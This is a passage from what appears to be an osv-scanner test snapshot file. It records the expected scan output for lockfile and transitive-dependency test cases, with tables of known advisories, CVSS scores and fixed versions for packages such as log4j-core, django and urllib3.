+-------------------------------------+------+-----------+----------+---------+---------------+------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+----------+---------+---------------+------------------------------------+ | https://osv.dev/GHSA-9m3q-rhmv-5q44 | 7.5 | RubyGems | json | 2.10.1 | 2.10.2 | testdata/locks-scalibr/gems.locked | | https://osv.dev/GHSA-353f-x4gh-cqq8 | | RubyGems | nokogiri | 1.18.2 | 1.18.9 | testdata/locks-scalibr/gems.locked | | https://osv.dev/GHSA-5w6v-399v-w3cc | | RubyGems | nokogiri | 1.18.2 | 1.18.8 | testdata/locks-scalibr/gems.locked | | https://osv.dev/GHSA-mrxw-mxhj-p664 | 7.8 | RubyGems | nokogiri | 1.18.2 | 1.18.4 | testdata/locks-scalibr/gems.locked | | https://osv.dev/GHSA-vvfq-8hwr-qm4m | | RubyGems | nokogiri | 1.18.2 | 1.18.3 | testdata/locks-scalibr/gems.locked | | https://osv.dev/GHSA-wx95-c6cv-8532 | 5.3 | RubyGems | nokogiri | 1.18.2 | 1.19.1 | testdata/locks-scalibr/gems.locked | +-------------------------------------+------+-----------+----------+---------+---------------+------------------------------------+ --- [TestCommand_MoreLockfiles/gems.locked - 2] --- [TestCommand_MoreLockfiles/packages.config - 1] Scanned /testdata/locks-scalibr/packages.config file and found 2 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- [TestCommand_MoreLockfiles/packages.config - 2] --- [TestCommand_MoreLockfiles/packages.lock.json - 1] Scanned /testdata/locks-scalibr/packages.lock.json file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. 
No issues found --- [TestCommand_MoreLockfiles/packages.lock.json - 2] --- [TestCommand_MoreLockfiles/stack.yaml.lock - 1] Scanned /testdata/locks-scalibr/stack.yaml.lock file and found 4 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- [TestCommand_MoreLockfiles/stack.yaml.lock - 2] --- [TestCommand_MoreLockfiles/uv.lock - 1] Scanned /testdata/locks-scalibr/uv.lock file and found 2 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 1 package affected by 2 known vulnerabilities (0 Critical, 2 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 2 vulnerabilities can be fixed. +-------------------------------------+------+-----------+----------+---------+---------------+--------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+----------+---------+---------------+--------------------------------+ | https://osv.dev/GHSA-7gcm-g887-7qv7 | 8.2 | PyPI | protobuf | 4.25.5 | 5.29.6 | testdata/locks-scalibr/uv.lock | | https://osv.dev/GHSA-8qvm-5x2c-j2w7 | 8.2 | PyPI | protobuf | 4.25.5 | 4.25.8 | testdata/locks-scalibr/uv.lock | +-------------------------------------+------+-----------+----------+---------+---------------+--------------------------------+ --- [TestCommand_MoreLockfiles/uv.lock - 2] --- [TestCommand_Transitive/invalid_data_source_error - 1] --- [TestCommand_Transitive/invalid_data_source_error - 2] unsupported data-source "github" - must be one of: deps.dev, native --- [TestCommand_Transitive/pom.xml_enricher_requires_extractor - 1] Scanning dir ./testdata/maven-transitive/abc.xml --- [TestCommand_Transitive/pom.xml_enricher_requires_extractor - 2] No package sources found, --help for 
usage information. --- [TestCommand_Transitive/pom.xml_multiple_registries - 1] Scanned /testdata/maven-transitive/registry.xml file and found 2 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 2 packages affected by 6 known vulnerabilities (2 Critical, 1 High, 3 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 6 vulnerabilities can be fixed. +-------------------------------------+------+-----------+-----------------------------------------------+---------+---------------+----------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+-----------------------------------------------+---------+---------------+----------------------------------------+ | https://osv.dev/GHSA-cm6r-892j-jv2g | 6.1 | Maven | com.google.android.gms:play-services-basement | 10.0.0 | 18.0.2 | testdata/maven-transitive/registry.xml | | https://osv.dev/GHSA-7rjr-3q55-vv33 | 9.0 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.16.0 | testdata/maven-transitive/registry.xml | | https://osv.dev/GHSA-8489-44mv-ggj8 | 6.6 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.17.1 | testdata/maven-transitive/registry.xml | | https://osv.dev/GHSA-jfh8-c2jp-5v3q | 10.0 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.15.0 | testdata/maven-transitive/registry.xml | | https://osv.dev/GHSA-p6xc-xr62-6r2g | 8.6 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.17.0 | testdata/maven-transitive/registry.xml | | https://osv.dev/GHSA-vc5p-v9hr-52mj | 6.3 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.25.3 | testdata/maven-transitive/registry.xml | +-------------------------------------+------+-----------+-----------------------------------------------+---------+---------------+----------------------------------------+ --- 
[TestCommand_Transitive/pom.xml_multiple_registries - 2] --- [TestCommand_Transitive/pom.xml_no_resolve_no_transitive - 1] Scanning dir ./testdata/maven-transitive/pom.xml Scanned /testdata/maven-transitive/pom.xml file and found 1 package No issues found --- [TestCommand_Transitive/pom.xml_no_resolve_no_transitive - 2] --- [TestCommand_Transitive/pom.xml_non_utf8_encoding - 1] Scanned /testdata/maven-transitive/encoding.xml file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 1 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 1 vulnerability can be fixed. +-------------------------------------+------+-----------+-------------+---------+---------------+----------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+-------------+---------+---------------+----------------------------------------+ | https://osv.dev/GHSA-269g-pwp5-87pp | 4.4 | Maven | junit:junit | 4.12 | 4.13.1 | testdata/maven-transitive/encoding.xml | +-------------------------------------+------+-----------+-------------+---------+---------------+----------------------------------------+ --- [TestCommand_Transitive/pom.xml_non_utf8_encoding - 2] --- [TestCommand_Transitive/pom.xml_offline_no_transitive - 1] Scanning dir ./testdata/maven-transitive/pom.xml Scanned /testdata/maven-transitive/pom.xml file and found 1 package Loaded Maven local db from /osv-scanner/Maven/all.zip No issues found --- [TestCommand_Transitive/pom.xml_offline_no_transitive - 2] --- [TestCommand_Transitive/pom.xml_transitive_default - 1] Scanning dir ./testdata/maven-transitive/pom.xml Scanned /testdata/maven-transitive/pom.xml file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run 
on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 1 package affected by 5 known vulnerabilities (2 Critical, 1 High, 2 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 5 vulnerabilities can be fixed. +-------------------------------------+------+-----------+-------------------------------------+---------+---------------+-----------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+-------------------------------------+---------+---------------+-----------------------------------+ | https://osv.dev/GHSA-7rjr-3q55-vv33 | 9.0 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.16.0 | testdata/maven-transitive/pom.xml | | https://osv.dev/GHSA-8489-44mv-ggj8 | 6.6 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.17.1 | testdata/maven-transitive/pom.xml | | https://osv.dev/GHSA-jfh8-c2jp-5v3q | 10.0 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.15.0 | testdata/maven-transitive/pom.xml | | https://osv.dev/GHSA-p6xc-xr62-6r2g | 8.6 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.17.0 | testdata/maven-transitive/pom.xml | | https://osv.dev/GHSA-vc5p-v9hr-52mj | 6.3 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.25.3 | testdata/maven-transitive/pom.xml | +-------------------------------------+------+-----------+-------------------------------------+---------+---------------+-----------------------------------+ --- [TestCommand_Transitive/pom.xml_transitive_default - 2] --- [TestCommand_Transitive/pom.xml_transitive_explicit_lockfile - 1] Scanned /testdata/maven-transitive/abc.xml file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. 
Total 1 package affected by 5 known vulnerabilities (2 Critical, 1 High, 2 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 5 vulnerabilities can be fixed. +-------------------------------------+------+-----------+-------------------------------------+---------+---------------+-----------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+-------------------------------------+---------+---------------+-----------------------------------+ | https://osv.dev/GHSA-7rjr-3q55-vv33 | 9.0 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.16.0 | testdata/maven-transitive/abc.xml | | https://osv.dev/GHSA-8489-44mv-ggj8 | 6.6 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.17.1 | testdata/maven-transitive/abc.xml | | https://osv.dev/GHSA-jfh8-c2jp-5v3q | 10.0 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.15.0 | testdata/maven-transitive/abc.xml | | https://osv.dev/GHSA-p6xc-xr62-6r2g | 8.6 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.17.0 | testdata/maven-transitive/abc.xml | | https://osv.dev/GHSA-vc5p-v9hr-52mj | 6.3 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.25.3 | testdata/maven-transitive/abc.xml | +-------------------------------------+------+-----------+-------------------------------------+---------+---------------+-----------------------------------+ --- [TestCommand_Transitive/pom.xml_transitive_explicit_lockfile - 2] --- [TestCommand_Transitive/pom.xml_transitive_native_source - 1] Scanned /testdata/maven-transitive/registry.xml file and found 2 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 2 packages affected by 6 known vulnerabilities (2 Critical, 1 High, 3 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 6 vulnerabilities can be fixed. 
+-------------------------------------+------+-----------+-----------------------------------------------+---------+---------------+----------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+-----------------------------------------------+---------+---------------+----------------------------------------+ | https://osv.dev/GHSA-cm6r-892j-jv2g | 6.1 | Maven | com.google.android.gms:play-services-basement | 10.0.0 | 18.0.2 | testdata/maven-transitive/registry.xml | | https://osv.dev/GHSA-7rjr-3q55-vv33 | 9.0 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.16.0 | testdata/maven-transitive/registry.xml | | https://osv.dev/GHSA-8489-44mv-ggj8 | 6.6 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.17.1 | testdata/maven-transitive/registry.xml | | https://osv.dev/GHSA-jfh8-c2jp-5v3q | 10.0 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.15.0 | testdata/maven-transitive/registry.xml | | https://osv.dev/GHSA-p6xc-xr62-6r2g | 8.6 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.17.0 | testdata/maven-transitive/registry.xml | | https://osv.dev/GHSA-vc5p-v9hr-52mj | 6.3 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.25.3 | testdata/maven-transitive/registry.xml | +-------------------------------------+------+-----------+-----------------------------------------------+---------+---------------+----------------------------------------+ --- [TestCommand_Transitive/pom.xml_transitive_native_source - 2] --- [TestCommand_Transitive/requirements.txt_enricher_requires_extractor - 1] Scanning dir ./testdata/locks-requirements/requirements-transitive.txt Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. 
--- [TestCommand_Transitive/requirements.txt_enricher_requires_extractor - 2] No package sources found, --help for usage information. --- [TestCommand_Transitive/requirements.txt_no_resolve_no_transitive - 1] Scanning dir ./testdata/locks-requirements/requirements.txt Scanned /testdata/locks-requirements/requirements.txt file and found 3 packages Total 3 packages affected by 12 known vulnerabilities (1 Critical, 4 High, 6 Medium, 1 Low, 0 Unknown) from 1 ecosystem. 12 vulnerabilities can be fixed. +-------------------------------------+------+-----------+----------+---------+---------------+----------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+----------+---------+---------------+----------------------------------------------+ | https://osv.dev/PYSEC-2021-98 | 6.9 | PyPI | django | 1.11.29 | 2.2.24 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-68w8-qjq3-2gfm | | | | | | | | https://osv.dev/GHSA-6w2r-r2m5-xq5w | 7.1 | PyPI | django | 1.11.29 | 4.2.24 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-7xr5-9hcq-chf9 | 4.0 | PyPI | django | 1.11.29 | 4.2.22 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-8x94-hmjh-97hq | 8.8 | PyPI | django | 1.11.29 | 3.2.15 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-frmv-pr5f-9mcr | 9.1 | PyPI | django | 1.11.29 | 4.2.26 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-qw25-v68c-qjf3 | 7.5 | PyPI | django | 1.11.29 | 4.2.26 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-rrqc-c2jx-6jgv | 6.3 | PyPI | django | 1.11.29 | 4.2.16 | testdata/locks-requirements/requirements.txt | | https://osv.dev/PYSEC-2023-62 | 8.7 | PyPI | flask | 1.0.0 | 2.2.5 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-m2qf-hxjv-5gpq | | | | | | | | 
https://osv.dev/GHSA-68rp-wp8r-4726 | 2.3 | PyPI | flask | 1.0.0 | 3.1.3 | testdata/locks-requirements/requirements.txt | | https://osv.dev/PYSEC-2023-74 | 6.1 | PyPI | requests | 2.20.0 | 2.31.0 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-j8r2-6x86-q33q | | | | | | | | https://osv.dev/GHSA-9hjg-9r4m-mvj7 | 5.3 | PyPI | requests | 2.20.0 | 2.32.4 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-9wx4-h78v-vm56 | 5.6 | PyPI | requests | 2.20.0 | 2.32.0 | testdata/locks-requirements/requirements.txt | +-------------------------------------+------+-----------+----------+---------+---------------+----------------------------------------------+ --- [TestCommand_Transitive/requirements.txt_no_resolve_no_transitive - 2] --- [TestCommand_Transitive/requirements.txt_offline_no_transitive - 1] Scanning dir ./testdata/locks-requirements/requirements.txt Scanned /testdata/locks-requirements/requirements.txt file and found 3 packages Loaded PyPI local db from /osv-scanner/PyPI/all.zip Total 3 packages affected by 12 known vulnerabilities (1 Critical, 4 High, 6 Medium, 1 Low, 0 Unknown) from 1 ecosystem. 12 vulnerabilities can be fixed. 
+-------------------------------------+------+-----------+----------+---------+---------------+----------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+----------+---------+---------------+----------------------------------------------+ | https://osv.dev/PYSEC-2021-98 | 6.9 | PyPI | django | 1.11.29 | 2.2.24 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-68w8-qjq3-2gfm | | | | | | | | https://osv.dev/GHSA-6w2r-r2m5-xq5w | 7.1 | PyPI | django | 1.11.29 | 4.2.24 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-7xr5-9hcq-chf9 | 4.0 | PyPI | django | 1.11.29 | 4.2.22 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-8x94-hmjh-97hq | 8.8 | PyPI | django | 1.11.29 | 3.2.15 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-frmv-pr5f-9mcr | 9.1 | PyPI | django | 1.11.29 | 4.2.26 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-qw25-v68c-qjf3 | 7.5 | PyPI | django | 1.11.29 | 4.2.26 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-rrqc-c2jx-6jgv | 6.3 | PyPI | django | 1.11.29 | 4.2.16 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-68rp-wp8r-4726 | 2.3 | PyPI | flask | 1.0.0 | 3.1.3 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-m2qf-hxjv-5gpq | 8.7 | PyPI | flask | 1.0.0 | 2.2.5 | testdata/locks-requirements/requirements.txt | | https://osv.dev/PYSEC-2023-74 | 6.1 | PyPI | requests | 2.20.0 | 2.31.0 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-j8r2-6x86-q33q | | | | | | | | https://osv.dev/GHSA-9hjg-9r4m-mvj7 | 5.3 | PyPI | requests | 2.20.0 | 2.32.4 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-9wx4-h78v-vm56 | 5.6 | PyPI | requests | 2.20.0 | 2.32.0 | testdata/locks-requirements/requirements.txt | 
+-------------------------------------+------+-----------+----------+---------+---------------+----------------------------------------------+ --- [TestCommand_Transitive/requirements.txt_offline_no_transitive - 2] --- [TestCommand_Transitive/requirements.txt_resolution_fallback - 1] Scanning dir ./testdata/locks-requirements/unresolvable-requirements.txt Scanned /testdata/locks-requirements/unresolvable-requirements.txt file and found 3 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 3 packages affected by 9 known vulnerabilities (0 Critical, 3 High, 4 Medium, 1 Low, 1 Unknown) from 1 ecosystem. 9 vulnerabilities can be fixed. +-------------------------------------+------+-----------+------------+---------+---------------+-----------------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+------------+---------+---------------+-----------------------------------------------------------+ | https://osv.dev/PYSEC-2023-62 | 8.7 | PyPI | flask | 1.0.0 | 2.2.5 | testdata/locks-requirements/unresolvable-requirements.txt | | https://osv.dev/GHSA-m2qf-hxjv-5gpq | | | | | | | | https://osv.dev/GHSA-68rp-wp8r-4726 | 2.3 | PyPI | flask | 1.0.0 | 3.1.3 | testdata/locks-requirements/unresolvable-requirements.txt | | https://osv.dev/PYSEC-2020-43 | 8.7 | PyPI | flask-cors | 1.0.0 | 3.0.9 | testdata/locks-requirements/unresolvable-requirements.txt | | https://osv.dev/GHSA-xc3p-ff3m-f46v | | | | | | | | https://osv.dev/PYSEC-2024-71 | 8.7 | PyPI | flask-cors | 1.0.0 | 4.0.2 | testdata/locks-requirements/unresolvable-requirements.txt | | https://osv.dev/GHSA-hxwh-jpp2-84pm | | | | | | | | https://osv.dev/GHSA-43qf-4rqw-9q2g | 5.3 | PyPI | flask-cors | 1.0.0 | 6.0.0 | testdata/locks-requirements/unresolvable-requirements.txt | | 
https://osv.dev/GHSA-7rxf-gvfg-47g4 | 4.3 | PyPI | flask-cors | 1.0.0 | 6.0.0 | testdata/locks-requirements/unresolvable-requirements.txt | | https://osv.dev/GHSA-84pr-m4jr-85g5 | 5.3 | PyPI | flask-cors | 1.0.0 | 4.0.1 | testdata/locks-requirements/unresolvable-requirements.txt | | https://osv.dev/GHSA-8vgw-p6qm-5gr7 | 5.3 | PyPI | flask-cors | 1.0.0 | 6.0.0 | testdata/locks-requirements/unresolvable-requirements.txt | | https://osv.dev/PYSEC-2020-73 | | PyPI | pandas | 0.23.4 | 1.0.4 | testdata/locks-requirements/unresolvable-requirements.txt | +-------------------------------------+------+-----------+------------+---------+---------------+-----------------------------------------------------------+ --- [TestCommand_Transitive/requirements.txt_resolution_fallback - 2] --- [TestCommand_Transitive/requirements.txt_transitive_default - 1] Scanned /testdata/locks-requirements/requirements.txt file and found 3 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 5 packages affected by 22 known vulnerabilities (1 Critical, 9 High, 10 Medium, 1 Low, 1 Unknown) from 1 ecosystem. 22 vulnerabilities can be fixed. 
+-------------------------------------+------+-----------+----------+---------+---------------+----------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+----------+---------+---------------+----------------------------------------------+ | https://osv.dev/PYSEC-2021-98 | 6.9 | PyPI | django | 1.11.29 | 2.2.24 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-68w8-qjq3-2gfm | | | | | | | | https://osv.dev/GHSA-6w2r-r2m5-xq5w | 7.1 | PyPI | django | 1.11.29 | 4.2.24 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-7xr5-9hcq-chf9 | 4.0 | PyPI | django | 1.11.29 | 4.2.22 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-8x94-hmjh-97hq | 8.8 | PyPI | django | 1.11.29 | 3.2.15 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-frmv-pr5f-9mcr | 9.1 | PyPI | django | 1.11.29 | 4.2.26 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-qw25-v68c-qjf3 | 7.5 | PyPI | django | 1.11.29 | 4.2.26 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-rrqc-c2jx-6jgv | 6.3 | PyPI | django | 1.11.29 | 4.2.16 | testdata/locks-requirements/requirements.txt | | https://osv.dev/PYSEC-2023-62 | 8.7 | PyPI | flask | 1.0.0 | 2.2.5 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-m2qf-hxjv-5gpq | | | | | | | | https://osv.dev/GHSA-68rp-wp8r-4726 | 2.3 | PyPI | flask | 1.0.0 | 3.1.3 | testdata/locks-requirements/requirements.txt | | https://osv.dev/PYSEC-2023-74 | 6.1 | PyPI | requests | 2.20.0 | 2.31.0 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-j8r2-6x86-q33q | | | | | | | | https://osv.dev/GHSA-9hjg-9r4m-mvj7 | 5.3 | PyPI | requests | 2.20.0 | 2.32.4 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-9wx4-h78v-vm56 | 5.6 | PyPI | requests | 2.20.0 | 2.32.0 | 
testdata/locks-requirements/requirements.txt | | https://osv.dev/PYSEC-2024-60 | 7.5 | PyPI | idna | 2.7.0 | 3.7 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-jjg7-2v4v-x38h | | | | | | | | https://osv.dev/PYSEC-2020-148 | 6.9 | PyPI | urllib3 | 1.24.3 | 1.25.9 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-wqvq-5m8c-6g24 | | | | | | | | https://osv.dev/PYSEC-2021-108 | | PyPI | urllib3 | 1.24.3 | 1.26.5 | testdata/locks-requirements/requirements.txt | | https://osv.dev/PYSEC-2023-192 | 8.1 | PyPI | urllib3 | 1.24.3 | 1.26.17 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-v845-jxx5-vc9f | | | | | | | | https://osv.dev/PYSEC-2023-212 | 5.7 | PyPI | urllib3 | 1.24.3 | 1.26.18 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-g4mx-q9vg-27p4 | | | | | | | | https://osv.dev/GHSA-2xpw-w6gg-jr37 | 8.9 | PyPI | urllib3 | 1.24.3 | 2.6.0 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-34jh-p97f-mpxf | 4.4 | PyPI | urllib3 | 1.24.3 | 1.26.19 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-38jv-5279-wg99 | 8.9 | PyPI | urllib3 | 1.24.3 | 2.6.3 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-gm62-xv2j-4w53 | 8.9 | PyPI | urllib3 | 1.24.3 | 2.6.0 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-pq67-6m6q-mj2v | 5.3 | PyPI | urllib3 | 1.24.3 | 2.5.0 | testdata/locks-requirements/requirements.txt | +-------------------------------------+------+-----------+----------+---------+---------------+----------------------------------------------+ --- [TestCommand_Transitive/requirements.txt_transitive_default - 2] --- [TestCommand_Transitive/requirements.txt_transitive_native_source - 1] Scanned /testdata/locks-requirements/requirements.txt file and found 3 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. 
Please ensure you trust the source code and artifacts before proceeding. Total 5 packages affected by 22 known vulnerabilities (1 Critical, 9 High, 10 Medium, 1 Low, 1 Unknown) from 1 ecosystem. 22 vulnerabilities can be fixed. +-------------------------------------+------+-----------+----------+---------+---------------+----------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+----------+---------+---------------+----------------------------------------------+ | https://osv.dev/PYSEC-2021-98 | 6.9 | PyPI | django | 1.11.29 | 2.2.24 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-68w8-qjq3-2gfm | | | | | | | | https://osv.dev/GHSA-6w2r-r2m5-xq5w | 7.1 | PyPI | django | 1.11.29 | 4.2.24 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-7xr5-9hcq-chf9 | 4.0 | PyPI | django | 1.11.29 | 4.2.22 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-8x94-hmjh-97hq | 8.8 | PyPI | django | 1.11.29 | 3.2.15 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-frmv-pr5f-9mcr | 9.1 | PyPI | django | 1.11.29 | 4.2.26 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-qw25-v68c-qjf3 | 7.5 | PyPI | django | 1.11.29 | 4.2.26 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-rrqc-c2jx-6jgv | 6.3 | PyPI | django | 1.11.29 | 4.2.16 | testdata/locks-requirements/requirements.txt | | https://osv.dev/PYSEC-2023-62 | 8.7 | PyPI | flask | 1.0 | 2.2.5 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-m2qf-hxjv-5gpq | | | | | | | | https://osv.dev/GHSA-68rp-wp8r-4726 | 2.3 | PyPI | flask | 1.0 | 3.1.3 | testdata/locks-requirements/requirements.txt | | https://osv.dev/PYSEC-2023-74 | 6.1 | PyPI | requests | 2.20.0 | 2.31.0 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-j8r2-6x86-q33q | | | | | | | | 
https://osv.dev/GHSA-9hjg-9r4m-mvj7 | 5.3 | PyPI | requests | 2.20.0 | 2.32.4 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-9wx4-h78v-vm56 | 5.6 | PyPI | requests | 2.20.0 | 2.32.0 | testdata/locks-requirements/requirements.txt | | https://osv.dev/PYSEC-2024-60 | 7.5 | PyPI | idna | 2.7 | 3.7 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-jjg7-2v4v-x38h | | | | | | | | https://osv.dev/PYSEC-2020-148 | 6.9 | PyPI | urllib3 | 1.24.3 | 1.25.9 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-wqvq-5m8c-6g24 | | | | | | | | https://osv.dev/PYSEC-2021-108 | | PyPI | urllib3 | 1.24.3 | 1.26.5 | testdata/locks-requirements/requirements.txt | | https://osv.dev/PYSEC-2023-192 | 8.1 | PyPI | urllib3 | 1.24.3 | 1.26.17 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-v845-jxx5-vc9f | | | | | | | | https://osv.dev/PYSEC-2023-212 | 5.7 | PyPI | urllib3 | 1.24.3 | 1.26.18 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-g4mx-q9vg-27p4 | | | | | | | | https://osv.dev/GHSA-2xpw-w6gg-jr37 | 8.9 | PyPI | urllib3 | 1.24.3 | 2.6.0 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-34jh-p97f-mpxf | 4.4 | PyPI | urllib3 | 1.24.3 | 1.26.19 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-38jv-5279-wg99 | 8.9 | PyPI | urllib3 | 1.24.3 | 2.6.3 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-gm62-xv2j-4w53 | 8.9 | PyPI | urllib3 | 1.24.3 | 2.6.0 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-pq67-6m6q-mj2v | 5.3 | PyPI | urllib3 | 1.24.3 | 2.5.0 | testdata/locks-requirements/requirements.txt | +-------------------------------------+------+-----------+----------+---------+---------------+----------------------------------------------+ --- [TestCommand_Transitive/requirements.txt_transitive_native_source - 2] --- [TestCommand_WithDetector_OffLinux/ssh_version_errors - 1] Scanning dir 
